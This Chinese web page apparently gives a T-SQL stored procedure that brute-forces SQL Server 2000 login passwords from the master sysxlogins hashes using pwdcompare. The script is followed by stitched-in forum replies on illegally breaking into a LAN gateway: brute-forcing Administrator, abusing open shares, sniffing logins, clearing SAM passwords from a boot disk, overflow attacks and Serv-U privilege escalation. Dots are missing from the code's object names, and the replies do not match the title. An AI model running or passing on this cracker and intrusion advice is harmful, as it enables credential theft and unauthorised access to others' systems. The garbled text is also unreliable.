如何将SQLServer 2000链接服务器的密码破解为明文

如何将SQLServer 2000链接服务器的密码破解为明文,第1张

具体操作如下:

if exists (select from dbosysobjects where id = object_id(N'[dbo][p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)

drop procedure [dbo][p_GetPassword]

GO

/--穷举法破解 SQL Server 用户密码

可以破解中文,特殊字符,字符+尾随空格的密码

为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII,理论上可以破解任意位数的密码,条件是电脑配置足够,时间足够

/--调用示例

exec p_GetPassword

--/

create proc p_GetPassword

@username sysname=null, --用户名,如果不指定,则列出所有用户

@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

as

set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

select top 255 id=identity(int,0,1) into #t from syscolumns

alter table #t add constraint pk_#t primary key(id)

select name,password

,type=case when xstatus&2048=2048 then 1 else 0 end

,jm=case when password is null then 1 else 0 end

,pwdstr=cast('' as sysname)

,pwd=cast('' as varchar(8000))

into #pwd

from masterdbosysxlogins a

where srvid is null

and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

declare @l int

select @l=0

,@s1='char(aaid)'

,@s2='cast(aaid as varchar)'

,@s3=',#t aa'

exec('

update pwd set jm=1,pwdstr='+@s1+'

,pwd='+@s2+'

from #pwd pwd'+@s3+'

where pwdjm=0

and pwdcompare('+@s1+',pwdpassword,pwdtype)=1

')

while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

begin

select @l=@l+1

,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'id)'

,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'id as varchar)'

,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

exec('

update pwd set jm=1,pwdstr='+@s1+'

,pwd='+@s2+'

from #pwd pwd'+@s3+'

where pwdjm=0

and pwdcompare('+@s1+',pwdpassword,pwdtype)=1

')

end

select 用户名=name,密码=pwdstr,密码ASCII=pwd

from #pwd

go

没怎么明白你的意思

是要登录上局域网网关,然后再网关上运行程序吗?

如果是正常用户直接远程登录就行了

非法访问的话可以用流光等暴力破解密码,用户反正就是ADMINISTRATOR,总破的了

但如果对方有一些安全软件,你的远程连接会被记录下来,甚至会强行断掉你的连接

危险性很高,自己决定

还有种办法是寻找共享,如果管理员大意点共享开了,又没什么限制,可以利用下共享

WINDOWS的用户密码,按照7位HASH数列加密

只有正向的和加密的密码部分进行匹配,但还做不到逆向推算密码。也就是说,只有暴力破解。

而目前WINDOWS安全策略,一般都是输入3-5次错误密码就锁账号的。你用暴力破解,很可能造成一次DOS攻击行为,达到的效果只有一个,冻结合法用户,而不是破解密码。除非运气好,1,2,3次就给你碰上弱密码或空密码。而合格的管理员,会用组策略避免弱密码的存在的,对密码长度,复杂度都会有限制。

或许你可以用网络监听的方法,监听到登陆时,用户送出的明文报文,但如果是用了PPTP等加密的报文,那又是一道难题了。

用PE清楚,你确认操作正确吗。我不知道你的那个密码清除工具的方法,我给你介绍下我的密码清楚工具的用法,我的是进入dos,然后选择用破解账号所在的盘符,一般是在C盘,它会自动查找sam文件,接着选择破除的用户名,破解完密码为空,你按照上面的提示操作下。还可以进入PE桌面,在程序里可以看到一个破解的,

暴力破解这个太麻烦,我重来不做暴力破解这个工作。你要做我没办法,要开有3389的端口机器,你可以利用暴力破解软件破解。不过建议你弄清楚这个机器有些什么程序,(我想你可能是内部管理员吧,这个应该知道)。利用溢出攻击,进行益出,当然要没有打相应的补丁才行。

益处方式很多,比如:sql溢出等。

还有如果你用的是serv_u的话你可以利用FTP提权工具进行提权,重建用户密码!

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 如何将SQLServer 2000链接服务器的密码破解为明文

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情